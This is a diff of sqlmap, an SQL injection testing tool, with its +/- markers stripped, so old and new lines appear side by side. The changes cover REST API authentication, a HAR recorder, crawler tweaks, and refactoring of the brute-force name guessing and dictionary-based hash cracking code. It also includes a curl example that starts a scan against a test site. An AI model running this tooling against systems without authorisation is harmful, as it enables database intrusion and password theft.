conf.databaseCursor.execute("INSERT INTO errors VALUES(NULL, ?, ?)",
(self.taskid, str(value) if value else ""))
conf.databaseCursor.execute("INSERT INTO errors VALUES(NULL, ?, ?)", (self.taskid, str(value) if value else ""))
def flush(self):
pass
@@ -265,20 +263,16 @@ class StdDbOut(object):
def seek(self):
pass
class LogRecorder(logging.StreamHandler):
def emit(self, record):
"""
Record emitted events to IPC database for asynchronous I/O
communication with the parent process
"""
conf.databaseCursor.execute("INSERT INTO logs VALUES(NULL, ?, ?, ?, ?)",
(conf.taskid, time.strftime("%X"), record.levelname,
record.msg % record.args if record.args else record.msg))
conf.databaseCursor.execute("INSERT INTO logs VALUES(NULL, ?, ?, ?, ?)", (conf.taskid, time.strftime("%X"), record.levelname, record.msg % record.args if record.args else record.msg))
def setRestAPILog():
if hasattr(conf, "api"):
if conf.api:
try:
conf.databaseCursor = Database(conf.database)
conf.databaseCursor.connect("client")
@@ -290,11 +284,32 @@ def setRestAPILog():
LOGGER_RECORDER = LogRecorder()
logger.addHandler(LOGGER_RECORDER)
# Generic functions
def is_admin(taskid):
return DataStore.admin_id == taskid
@hook('before_request')
def check_authentication():
if not any((DataStore.username, DataStore.password)):
return
authorization = request.headers.get("Authorization", "")
match = re.search(r"(?i)\ABasic\s+([^\s]+)", authorization)
if not match:
request.environ["PATH_INFO"] = "/error/401"
try:
creds = match.group(1).decode("base64")
except:
request.environ["PATH_INFO"] = "/error/401"
else:
if creds.count(':') != 1:
request.environ["PATH_INFO"] = "/error/401"
else:
username, password = creds.split(':')
if username.strip() != (DataStore.username or "") or password.strip() != (DataStore.password or ""):
request.environ["PATH_INFO"] = "/error/401"
@hook("after_request")
def security_headers(json_header=True):
@@ -308,6 +323,7 @@ def security_headers(json_header=True):
response.headers["Pragma"] = "no-cache"
response.headers["Cache-Control"] = "no-cache"
response.headers["Expires"] = "0"
if json_header:
response.content_type = "application/json; charset=UTF-8"
@@ -315,35 +331,39 @@ def security_headers(json_header=True):
# HTTP Status Code functions #
##############################
@return_error(401) # Access Denied
def error401(error=None):
security_headers(False)
return "Access denied"
@return_error(404) # Not Found
def error404(error=None):
security_headers(False)
return "Nothing here"
@return_error(405) # Method Not Allowed (e.g. when requesting a POST method via GET)
def error405(error=None):
security_headers(False)
return "Method not allowed"
@return_error(500) # Internal Server Error
def error500(error=None):
security_headers(False)
return "Internal server error"
#############
# Auxiliary #
#############
@get('/error/401')
def path_401():
response.status = 401
return response
#############################
# Task management functions #
#############################
# Users' methods
@get("/task/new")
def task_new():
@@ -358,7 +378,6 @@ def task_new():
logger.debug("Created new task: '%s'" % taskid)
return jsonize({"success": True, "taskid": taskid})
@get("/task/<taskid>/delete")
def task_delete(taskid):
"""
@@ -377,7 +396,6 @@ def task_delete(taskid):
# Admin functions #
###################
@get("/admin/<taskid>/list")
def task_list(taskid=None):
"""
@@ -410,7 +428,6 @@ def task_flush(taskid):
# sqlmap core interact functions #
##################################
# Handle task's options
@get("/option/<taskid>/list")
def option_list(taskid):
@@ -424,7 +441,6 @@ def option_list(taskid):
logger.debug("[%s] Listed task options" % taskid)
return jsonize({"success": True, "options": DataStore.tasks[taskid].get_options()})
@post("/option/<taskid>/get")
def option_get(taskid):
"""
@@ -443,12 +459,12 @@ def option_get(taskid):
logger.debug("[%s] Requested value for unknown option %s" % (taskid, option))
return jsonize({"success": False, "message": "Unknown option", option: "not set"})
@post("/option/<taskid>/set")
def option_set(taskid):
"""
Set an option (command line switch) for a certain task ID
"""
if taskid not in DataStore.tasks:
logger.warning("[%s] Invalid task ID provided to option_set()" % taskid)
return jsonize({"success": False, "message": "Invalid task ID"})
@@ -459,13 +475,13 @@ def option_set(taskid):
logger.debug("[%s] Requested to set options" % taskid)
return jsonize({"success": True})
# Handle scans
@post("/scan/<taskid>/start")
def scan_start(taskid):
"""
Launch a scan
"""
if taskid not in DataStore.tasks:
logger.warning("[%s] Invalid task ID provided to scan_start()" % taskid)
return jsonize({"success": False, "message": "Invalid task ID"})
@@ -480,12 +496,12 @@ def scan_start(taskid):
logger.debug("[%s] Started scan" % taskid)
return jsonize({"success": True, "engineid": DataStore.tasks[taskid].engine_get_id()})
@get("/scan/<taskid>/stop")
def scan_stop(taskid):
"""
Stop a scan
"""
if (taskid not in DataStore.tasks or
DataStore.tasks[taskid].engine_process() is None or
DataStore.tasks[taskid].engine_has_terminated()):
@@ -497,12 +513,12 @@ def scan_stop(taskid):
logger.debug("[%s] Stopped scan" % taskid)
return jsonize({"success": True})
@get("/scan/<taskid>/kill")
def scan_kill(taskid):
"""
Kill a scan
"""
if (taskid not in DataStore.tasks or
DataStore.tasks[taskid].engine_process() is None or
DataStore.tasks[taskid].engine_has_terminated()):
@@ -514,12 +530,12 @@ def scan_kill(taskid):
logger.debug("[%s] Killed scan" % taskid)
return jsonize({"success": True})
@get("/scan/<taskid>/status")
def scan_status(taskid):
"""
Returns status of a scan
"""
if taskid not in DataStore.tasks:
logger.warning("[%s] Invalid task ID provided to scan_status()" % taskid)
return jsonize({"success": False, "message": "Invalid task ID"})
@@ -536,12 +552,12 @@ def scan_status(taskid):
"returncode": DataStore.tasks[taskid].engine_get_returncode()
})
@get("/scan/<taskid>/data")
def scan_data(taskid):
"""
Retrieve the data of a scan
"""
json_data_message = list()
json_errors_message = list()
@@ -550,16 +566,11 @@ def scan_data(taskid):
return jsonize({"success": False, "message": "Invalid task ID"})
# Read all data from the IPC database for the taskid
for status, content_type, value in DataStore.current_db.execute(
"SELECT status, content_type, value FROM data WHERE taskid = ? ORDER BY id ASC",
(taskid,)):
json_data_message.append(
{"status": status, "type": content_type, "value": dejsonize(value)})
for status, content_type, value in DataStore.current_db.execute("SELECT status, content_type, value FROM data WHERE taskid = ? ORDER BY id ASC", (taskid,)):
json_data_message.append({"status": status, "type": content_type, "value": dejsonize(value)})
# Read all error messages from the IPC database
for error in DataStore.current_db.execute(
"SELECT error FROM errors WHERE taskid = ? ORDER BY id ASC",
(taskid,)):
for error in DataStore.current_db.execute("SELECT error FROM errors WHERE taskid = ? ORDER BY id ASC", (taskid,)):
json_errors_message.append(error)
logger.debug("[%s] Retrieved scan data and error messages" % taskid)
@@ -572,6 +583,7 @@ def scan_log_limited(taskid, start, end):
"""
Retrieve a subset of log messages
"""
json_log_messages = list()
if taskid not in DataStore.tasks:
@@ -586,10 +598,7 @@ def scan_log_limited(taskid, start, end):
end = max(1, int(end))
# Read a subset of log messages from the IPC database
for time_, level, message in DataStore.current_db.execute(
("SELECT time, level, message FROM logs WHERE "
"taskid = ? AND id >= ? AND id <= ? ORDER BY id ASC"),
(taskid, start, end)):
for time_, level, message in DataStore.current_db.execute("SELECT time, level, message FROM logs WHERE taskid = ? AND id >= ? AND id <= ? ORDER BY id ASC", (taskid, start, end)):
json_log_messages.append({"time": time_, "level": level, "message": message})
logger.debug("[%s] Retrieved scan log messages subset" % taskid)
@@ -601,6 +610,7 @@ def scan_log(taskid):
"""
Retrieve the log messages
"""
json_log_messages = list()
if taskid not in DataStore.tasks:
@@ -608,8 +618,7 @@ def scan_log(taskid):
return jsonize({"success": False, "message": "Invalid task ID"})
# Read all log messages from the IPC database
for time_, level, message in DataStore.current_db.execute(
"SELECT time, level, message FROM logs WHERE taskid = ? ORDER BY id ASC", (taskid,)):
for time_, level, message in DataStore.current_db.execute("SELECT time, level, message FROM logs WHERE taskid = ? ORDER BY id ASC", (taskid,)):
json_log_messages.append({"time": time_, "level": level, "message": message})
logger.debug("[%s] Retrieved scan log messages" % taskid)
@@ -622,6 +631,7 @@ def download(taskid, target, filename):
"""
Download a certain file from the file system
"""
if taskid not in DataStore.tasks:
logger.warning("[%s] Invalid task ID provided to download()" % taskid)
return jsonize({"success": False, "message": "Invalid task ID"})
@@ -642,12 +652,17 @@ def download(taskid, target, filename):
return jsonize({"success": False, "message": "File does not exist"})
def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=RESTAPI_DEFAULT_ADAPTER):
def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=RESTAPI_DEFAULT_ADAPTER, username=None, password=None):
"""
REST-JSON API server
"""
DataStore.admin_id = hexencode(os.urandom(16))
Database.filepath = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.IPC, text=False)[1]
DataStore.username = username
DataStore.password = password
_, Database.filepath = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.IPC, text=False)
os.close(_)
if port == 0: # random
with contextlib.closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
@@ -656,7 +671,7 @@ def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=REST
logger.info("Running REST-JSON API server at '%s:%d'.." % (host, port))
logger.info("Admin ID: %s" % DataStore.admin_id)
logger.debug("IPC database: %s" % Database.filepath)
logger.debug("IPC database: '%s'" % Database.filepath)
# Initialize IPC database
DataStore.current_db = Database()
@@ -665,6 +680,9 @@ def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=REST
# Run RESTful API
try:
# Supported adapters: aiohttp, auto, bjoern, cgi, cherrypy, diesel, eventlet, fapws3, flup, gae, gevent, geventSocketIO, gunicorn, meinheld, paste, rocket, tornado, twisted, waitress, wsgiref
# Reference: https://bottlepy.org/docs/dev/deployment.html || bottle.server_names
if adapter == "gevent":
from gevent import monkey
monkey.patch_all()
@@ -672,16 +690,19 @@ def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=REST
import eventlet
eventlet.monkey_patch()
logger.debug("Using adapter '%s' to run bottle" % adapter)
run(host=host, port=port, quiet=True, debug=False, server=adapter)
run(host=host, port=port, quiet=True, debug=True, server=adapter)
except socket.error, ex:
if "already in use" in getSafeExString(ex):
logger.error("Address already in use ('%s:%s')" % (host, port))
else:
raise
except ImportError:
errMsg = "Adapter '%s' is not available on this system" % adapter
if adapter in ("gevent", "eventlet"):
errMsg += " (e.g.: 'sudo apt-get install python-%s')" % adapter
if adapter.lower() not in server_names:
errMsg = "Adapter '%s' is unknown. " % adapter
errMsg += "(Note: available adapters '%s')" % ', '.join(sorted(server_names.keys()))
else:
errMsg = "Server support for adapter '%s' is not installed on this system " % adapter
errMsg += "(Note: you can try to install it with 'sudo apt-get install python-%s' or 'sudo pip install %s')" % (adapter, adapter)
logger.critical(errMsg)
def _client(url, options=None):
@@ -690,7 +711,12 @@ def _client(url, options=None):
data = None
if options is not None:
data = jsonize(options)
req = urllib2.Request(url, data, {'Content-Type': 'application/json'})
headers = {"Content-Type": "application/json"}
if DataStore.username or DataStore.password:
headers["Authorization"] = "Basic %s" % ("%s:%s" % (DataStore.username or "", DataStore.password or "")).encode("base64").strip()
req = urllib2.Request(url, data, headers)
response = urllib2.urlopen(req)
text = response.read()
except:
@@ -699,12 +725,14 @@ def _client(url, options=None):
raise
return text
def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT):
def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, username=None, password=None):
"""
REST-JSON API client
"""
DataStore.username = username
DataStore.password = password
dbgMsg = "Example client access from command line:"
dbgMsg += "\n\t$ taskid=$(curl http://%s:%d/task/new 2>1 | grep -o -I '[a-f0-9]\{16\}') && echo $taskid" % (host, port)
dbgMsg += "\n\t$ curl -H \"Content-Type: application/json\" -X POST -d '{\"url\": \"http://testphp.vulnweb.com/artists.php?artist=1\"}' http://%s:%d/scan/$taskid/start" % (host, port)
@@ -718,7 +746,7 @@ def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT):
try:
_client(addr)
except Exception, ex:
if not isinstance(ex, urllib2.HTTPError):
if not isinstance(ex, urllib2.HTTPError) or ex.code == httplib.UNAUTHORIZED:
errMsg = "There has been a problem while connecting to the "
errMsg += "REST-JSON API server at '%s' " % addr
errMsg += "(%s)" % ex
@@ -745,7 +773,7 @@ def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT):
if not res["success"]:
logger.error("Failed to execute command %s" % command)
dataToStdout("%s\n" % raw)
elif command.startswith("option"):
if not taskid:
logger.error("No task ID in use")

29
lib/techniques/brute/use.py → lib/utils/brute.py
View File

@@ -57,8 +57,7 @@ def tableExists(tableFile, regex=None):
logger.warn(warnMsg)
message = "are you sure you want to continue? [y/N] "
test = readInput(message, default="N")
kb.tableExistsChoice = test[0] in ("y", "Y")
kb.tableExistsChoice = readInput(message, default='N', boolean=True)
if not kb.tableExistsChoice:
return None
@@ -74,11 +73,19 @@ def tableExists(tableFile, regex=None):
errMsg += "to distinguish erroneous results)"
raise SqlmapDataException(errMsg)
tables = getFileItems(tableFile, lowercase=Backend.getIdentifiedDbms() in (DBMS.ACCESS,), unique=True)
message = "which common tables (wordlist) file do you want to use?\n"
message += "[1] default '%s' (press Enter)\n" % tableFile
message += "[2] custom"
choice = readInput(message, default='1')
if choice == '2':
message = "what's the custom common tables file location?\n"
tableFile = readInput(message) or tableFile
infoMsg = "checking table existence using items from '%s'" % tableFile
logger.info(infoMsg)
tables = getFileItems(tableFile, lowercase=Backend.getIdentifiedDbms() in (DBMS.ACCESS,), unique=True)
tables.extend(_addPageTextWords())
tables = filterListValue(tables, regex)
@@ -114,7 +121,7 @@ def tableExists(tableFile, regex=None):
threadData.shared.value.append(table)
threadData.shared.unique.add(table.lower())
if conf.verbose in (1, 2) and not hasattr(conf, "api"):
if conf.verbose in (1, 2) and not conf.api:
clearConsoleLine(True)
infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(table))
dataToStdout(infoMsg, True)
@@ -161,8 +168,7 @@ def columnExists(columnFile, regex=None):
logger.warn(warnMsg)
message = "are you sure you want to continue? [y/N] "
test = readInput(message, default="N")
kb.columnExistsChoice = test[0] in ("y", "Y")
kb.columnExistsChoice = readInput(message, default='N', boolean=True)
if not kb.columnExistsChoice:
return None
@@ -182,6 +188,15 @@ def columnExists(columnFile, regex=None):
errMsg += "to distinguish erroneous results)"
raise SqlmapDataException(errMsg)
message = "which common columns (wordlist) file do you want to use?\n"
message += "[1] default '%s' (press Enter)\n" % columnFile
message += "[2] custom"
choice = readInput(message, default='1')
if choice == '2':
message = "what's the custom common columns file location?\n"
columnFile = readInput(message) or columnFile
infoMsg = "checking column existence using items from '%s'" % columnFile
logger.info(infoMsg)
@@ -222,7 +237,7 @@ def columnExists(columnFile, regex=None):
if result:
threadData.shared.value.append(column)
if conf.verbose in (1, 2) and not hasattr(conf, "api"):
if conf.verbose in (1, 2) and not conf.api:
clearConsoleLine(True)
infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column))
dataToStdout(infoMsg, True)

17
lib/utils/crawler.py
View File

@@ -20,6 +20,7 @@ from lib.core.common import getSafeExString
from lib.core.common import openFile
from lib.core.common import readInput
from lib.core.common import safeCSValue
from lib.core.common import urldecode
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
@@ -87,7 +88,7 @@ def crawl(target):
tags = soup('a')
if not tags:
tags = re.finditer(r'(?si)<a[^>]+href="(?P<href>[^>"]+)"', content)
tags = re.finditer(r'(?i)<a[^>]+href="(?P<href>[^>"]+)"', content)
for tag in tags:
href = tag.get("href") if hasattr(tag, "get") else tag.group("href")
@@ -111,10 +112,10 @@ def crawl(target):
threadData.shared.deeper.add(url)
if re.search(r"(.*?)\?(.+)", url):
threadData.shared.value.add(url)
except ValueError: # for non-valid links
pass
except UnicodeEncodeError: # for non-HTML files
pass
except ValueError: # for non-valid links
pass
finally:
if conf.forms:
findPageForms(content, current, False, True)
@@ -130,8 +131,8 @@ def crawl(target):
if not conf.sitemapUrl:
message = "do you want to check for the existence of "
message += "site's sitemap(.xml) [y/N] "
test = readInput(message, default="n")
if test[0] in ("y", "Y"):
if readInput(message, default='N', boolean=True):
found = True
items = None
url = urlparse.urljoin(target, "/sitemap.xml")
@@ -187,7 +188,7 @@ def crawl(target):
logger.warn(warnMsg)
else:
for url in threadData.shared.value:
kb.targets.add((url, None, None, None, None))
kb.targets.add((urldecode(url, kb.pageEncoding), None, None, None, None))
storeResultsToFile(kb.targets)
@@ -198,8 +199,8 @@ def storeResultsToFile(results):
if kb.storeCrawlingChoice is None:
message = "do you want to store crawling results to a temporary file "
message += "for eventual further processing with other tools [y/N] "
test = readInput(message, default="N")
kb.storeCrawlingChoice = test[0] in ("y", "Y")
kb.storeCrawlingChoice = readInput(message, default='N', boolean=True)
if kb.storeCrawlingChoice:
handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.CRAWLER, suffix=".csv" if conf.forms else ".txt")

229
lib/utils/har.py Normal file
View File

@@ -0,0 +1,229 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import base64
import BaseHTTPServer
import datetime
import httplib
import re
import StringIO
import time
from lib.core.bigarray import BigArray
from lib.core.settings import VERSION
# Reference: https://dvcs.w3.org/hg/webperf/raw-file/tip/specs/HAR/Overview.html
# http://www.softwareishard.com/har/viewer/
class HTTPCollectorFactory:
def __init__(self, harFile=False):
self.harFile = harFile
def create(self):
return HTTPCollector()
class HTTPCollector:
def __init__(self):
self.messages = BigArray()
self.extendedArguments = {}
def setExtendedArguments(self, arguments):
self.extendedArguments = arguments
def collectRequest(self, requestMessage, responseMessage, startTime=None, endTime=None):
self.messages.append(RawPair(requestMessage, responseMessage,
startTime=startTime, endTime=endTime,
extendedArguments=self.extendedArguments))
def obtain(self):
return {"log": {
"version": "1.2",
"creator": {"name": "sqlmap", "version": VERSION},
"entries": [pair.toEntry().toDict() for pair in self.messages],
}}
class RawPair:
def __init__(self, request, response, startTime=None, endTime=None, extendedArguments=None):
self.request = request
self.response = response
self.startTime = startTime
self.endTime = endTime
self.extendedArguments = extendedArguments or {}
def toEntry(self):
return Entry(request=Request.parse(self.request), response=Response.parse(self.response),
startTime=self.startTime, endTime=self.endTime,
extendedArguments=self.extendedArguments)
class Entry:
def __init__(self, request, response, startTime, endTime, extendedArguments):
self.request = request
self.response = response
self.startTime = startTime or 0
self.endTime = endTime or 0
self.extendedArguments = extendedArguments
def toDict(self):
out = {
"request": self.request.toDict(),
"response": self.response.toDict(),
"cache": {},
"timings": {
"send": -1,
"wait": -1,
"receive": -1,
},
"time": int(1000 * (self.endTime - self.startTime)),
"startedDateTime": "%s%s" % (datetime.datetime.fromtimestamp(self.startTime).isoformat(), time.strftime("%z")) if self.startTime else None
}
out.update(self.extendedArguments)
return out
class Request:
def __init__(self, method, path, httpVersion, headers, postBody=None, raw=None, comment=None):
self.method = method
self.path = path
self.httpVersion = httpVersion
self.headers = headers or {}
self.postBody = postBody
self.comment = comment.strip() if comment else comment
self.raw = raw
@classmethod
def parse(cls, raw):
request = HTTPRequest(raw)
return cls(method=request.command,
path=request.path,
httpVersion=request.request_version,
headers=request.headers,
postBody=request.rfile.read(),
comment=request.comment,
raw=raw)
@property
def url(self):
host = self.headers.get("Host", "unknown")
return "http://%s%s" % (host, self.path)
def toDict(self):
out = {
"httpVersion": self.httpVersion,
"method": self.method,
"url": self.url,
"headers": [dict(name=key.capitalize(), value=value) for key, value in self.headers.items()],
"cookies": [],
"queryString": [],
"headersSize": -1,
"bodySize": -1,
"comment": self.comment,
}
if self.postBody:
contentType = self.headers.get("Content-Type")
out["postData"] = {
"mimeType": contentType,
"text": self.postBody.rstrip("\r\n"),
}
return out
class Response:
extract_status = re.compile(r'\((\d{3}) (.*)\)')
def __init__(self, httpVersion, status, statusText, headers, content, raw=None, comment=None):
self.raw = raw
self.httpVersion = httpVersion
self.status = status
self.statusText = statusText
self.headers = headers
self.content = content
self.comment = comment.strip() if comment else comment
@classmethod
def parse(cls, raw):
altered = raw
comment = ""
if altered.startswith("HTTP response [") or altered.startswith("HTTP redirect ["):
io = StringIO.StringIO(raw)
first_line = io.readline()
parts = cls.extract_status.search(first_line)
status_line = "HTTP/1.0 %s %s" % (parts.group(1), parts.group(2))
remain = io.read()
altered = status_line + "\r\n" + remain
comment = first_line
response = httplib.HTTPResponse(FakeSocket(altered))
response.begin()
try:
content = response.read(-1)
except httplib.IncompleteRead:
content = raw[raw.find("\r\n\r\n") + 4:].rstrip("\r\n")
return cls(httpVersion="HTTP/1.1" if response.version == 11 else "HTTP/1.0",
status=response.status,
statusText=response.reason,
headers=response.msg,
content=content,
comment=comment,
raw=raw)
def toDict(self):
content = {
"mimeType": self.headers.get("Content-Type"),
"text": self.content,
"size": len(self.content or "")
}
binary = set(['\0', '\1'])
if any(c in binary for c in self.content):
content["encoding"] = "base64"
content["text"] = base64.b64encode(self.content)
return {
"httpVersion": self.httpVersion,
"status": self.status,
"statusText": self.statusText,
"headers": [dict(name=key.capitalize(), value=value) for key, value in self.headers.items() if key.lower() != "uri"],
"cookies": [],
"content": content,
"headersSize": -1,
"bodySize": -1,
"redirectURL": "",
"comment": self.comment,
}
class FakeSocket:
# Original source:
# https://stackoverflow.com/questions/24728088/python-parse-http-response-string
def __init__(self, response_text):
self._file = StringIO.StringIO(response_text)
def makefile(self, *args, **kwargs):
return self._file
class HTTPRequest(BaseHTTPServer.BaseHTTPRequestHandler):
# Original source:
# https://stackoverflow.com/questions/4685217/parse-raw-http-headers
def __init__(self, request_text):
self.comment = None
self.rfile = StringIO.StringIO(request_text)
self.raw_requestline = self.rfile.readline()
if self.raw_requestline.startswith("HTTP request ["):
self.comment = self.raw_requestline
self.raw_requestline = self.rfile.readline()
self.error_code = self.error_message = None
self.parse_request()
def send_error(self, code, message):
self.error_code = code
self.error_message = message

59
lib/utils/hash.py
View File

@@ -382,8 +382,8 @@ def storeHashesToFile(attack_dict):
if kb.storeHashesChoice is None:
message = "do you want to store hashes to a temporary file "
message += "for eventual further processing with other tools [y/N] "
test = readInput(message, default="N")
kb.storeHashesChoice = test[0] in ("y", "Y")
kb.storeHashesChoice = readInput(message, default='N', boolean=True)
if not kb.storeHashesChoice:
return
@@ -482,11 +482,11 @@ def attackDumpedTable():
storeHashesToFile(attack_dict)
message = "do you want to crack them via a dictionary-based attack? %s" % ("[y/N/q]" if conf.multipleTargets else "[Y/n/q]")
test = readInput(message, default="N" if conf.multipleTargets else "Y")
choice = readInput(message, default='N' if conf.multipleTargets else 'Y').upper()
if test[0] in ("n", "N"):
if choice == 'N':
return
elif test[0] in ("q", "Q"):
elif choice == 'Q':
raise SqlmapUserQuitException
results = dictionaryAttack(attack_dict)
@@ -529,7 +529,7 @@ def hashRecognition(value):
return retVal
def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc_count, wordlists, custom_wordlist):
def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc_count, wordlists, custom_wordlist, api):
if IS_WIN:
coloramainit()
@@ -583,7 +583,7 @@ def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc
status = 'current status: %s... %s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator])
if not hasattr(conf, "api"):
if not api:
dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status))
except KeyboardInterrupt:
@@ -605,7 +605,7 @@ def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc
with proc_count.get_lock():
proc_count.value -= 1
def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found, proc_id, proc_count, wordlists, custom_wordlist):
def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found, proc_id, proc_count, wordlists, custom_wordlist, api):
if IS_WIN:
coloramainit()
@@ -657,7 +657,7 @@ def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found
if user and not user.startswith(DUMMY_USER_PREFIX):
status += ' (user: %s)' % user
if not hasattr(conf, "api"):
if not api:
dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status))
except KeyboardInterrupt:
@@ -766,20 +766,20 @@ def dictionaryAttack(attack_dict):
message += "[1] default dictionary file '%s' (press Enter)\n" % dictPaths[0]
message += "[2] custom dictionary file\n"
message += "[3] file with list of dictionary files"
choice = readInput(message, default="1")
choice = readInput(message, default='1')
try:
if choice == "2":
if choice == '2':
message = "what's the custom dictionary's location?\n"
dictPaths = [readInput(message)]
logger.info("using custom dictionary")
elif choice == "3":
_ = readInput(message)
if _:
dictPaths = [readInput(message)]
logger.info("using custom dictionary")
elif choice == '3':
message = "what's the list file location?\n"
listPath = readInput(message)
checkFile(listPath)
dictPaths = getFileItems(listPath)
logger.info("using custom list of dictionaries")
else:
logger.info("using default dictionary")
@@ -805,9 +805,8 @@ def dictionaryAttack(attack_dict):
logger.critical(warnMsg)
message = "do you want to use common password suffixes? (slow!) [y/N] "
test = readInput(message, default="N")
if test[0] in ("y", "Y"):
if readInput(message, default='N', boolean=True):
suffix_list += COMMON_PASSWORD_SUFFIXES
infoMsg = "starting dictionary-based cracking (%s)" % __functions__[hash_regex].func_name
@@ -843,12 +842,12 @@ def dictionaryAttack(attack_dict):
count = _multiprocessing.Value('i', _multiprocessing.cpu_count())
for i in xrange(_multiprocessing.cpu_count()):
p = _multiprocessing.Process(target=_bruteProcessVariantA, args=(attack_info, hash_regex, suffix, retVal, i, count, kb.wordlists, custom_wordlist))
processes.append(p)
process = _multiprocessing.Process(target=_bruteProcessVariantA, args=(attack_info, hash_regex, suffix, retVal, i, count, kb.wordlists, custom_wordlist, conf.api))
processes.append(process)
for p in processes:
p.daemon = True
p.start()
for process in processes:
process.daemon = True
process.start()
while count.value > 0:
time.sleep(0.5)
@@ -859,7 +858,7 @@ def dictionaryAttack(attack_dict):
singleTimeWarnMessage(warnMsg)
retVal = Queue()
_bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, 0, 1, kb.wordlists, custom_wordlist)
_bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, 0, 1, kb.wordlists, custom_wordlist, conf.api)
except KeyboardInterrupt:
print
@@ -927,12 +926,12 @@ def dictionaryAttack(attack_dict):
count = _multiprocessing.Value('i', _multiprocessing.cpu_count())
for i in xrange(_multiprocessing.cpu_count()):
p = _multiprocessing.Process(target=_bruteProcessVariantB, args=(user, hash_, kwargs, hash_regex, suffix, retVal, found_, i, count, kb.wordlists, custom_wordlist))
processes.append(p)
process = _multiprocessing.Process(target=_bruteProcessVariantB, args=(user, hash_, kwargs, hash_regex, suffix, retVal, found_, i, count, kb.wordlists, custom_wordlist, conf.api))
processes.append(process)
for p in processes:
p.daemon = True
p.start()
for process in processes:
process.daemon = True
process.start()
while count.value > 0:
time.sleep(0.5)
@@ -951,7 +950,7 @@ def dictionaryAttack(attack_dict):
found_ = Value()
found_.value = False
_bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found_, 0, 1, kb.wordlists, custom_wordlist)
_bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found_, 0, 1, kb.wordlists, custom_wordlist, conf.api)
found = found_.value

6
lib/utils/search.py
View File

@@ -111,11 +111,11 @@ def _search(dork):
message += "\n[1] (re)try with DuckDuckGo (default)"
message += "\n[2] (re)try with Disconnect Search"
message += "\n[3] quit"
choice = readInput(message, default="1").strip().upper()
choice = readInput(message, default='1')
if choice == "Q":
if choice == '3':
raise SqlmapUserQuitException
elif choice == "2":
elif choice == '2':
url = "https://search.disconnect.me/searchTerms/search?"
url += "start=nav&option=Web"
url += "&query=%s" % urlencode(dork, convall=True)

1
plugins/dbms/firebird/fingerprint.py
View File

@@ -18,7 +18,6 @@ from lib.core.enums import DBMS
from lib.core.session import setDbms
from lib.core.settings import FIREBIRD_ALIASES
from lib.core.settings import METADB_SUFFIX
from lib.core.settings import UNKNOWN_DBMS_VERSION
from lib.request import inject
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint

1
plugins/dbms/hsqldb/enumeration.py
View File

@@ -10,7 +10,6 @@ from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.common import Backend
from lib.core.common import unArrayizeValue
from lib.core.enums import DBMS
from lib.core.settings import HSQLDB_DEFAULT_SCHEMA

5
plugins/dbms/hsqldb/fingerprint.py
View File

@@ -16,7 +16,6 @@ from lib.core.data import logger
from lib.core.enums import DBMS
from lib.core.session import setDbms
from lib.core.settings import HSQLDB_ALIASES
from lib.core.settings import UNKNOWN_DBMS_VERSION
from lib.request import inject
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint
@@ -28,13 +27,13 @@ class Fingerprint(GenericFingerprint):
value = ""
wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp and not hasattr(conf, "api"):
if wsOsFp and not conf.api:
value += "%s\n" % wsOsFp
if kb.data.banner:
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp and not hasattr(conf, "api"):
if dbmsOsFp and not conf.api:
value += "%s\n" % dbmsOsFp
value += "back-end DBMS: "

15
plugins/dbms/maxdb/enumeration.py
View File

@@ -5,7 +5,6 @@ Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.common import Backend
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.common import safeSQLIdentificatorNaming
@@ -20,8 +19,8 @@ from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapUserQuitException
from lib.core.settings import CURRENT_DB
from lib.utils.brute import columnExists
from lib.utils.pivotdumptable import pivotDumpTable
from lib.techniques.brute.use import columnExists
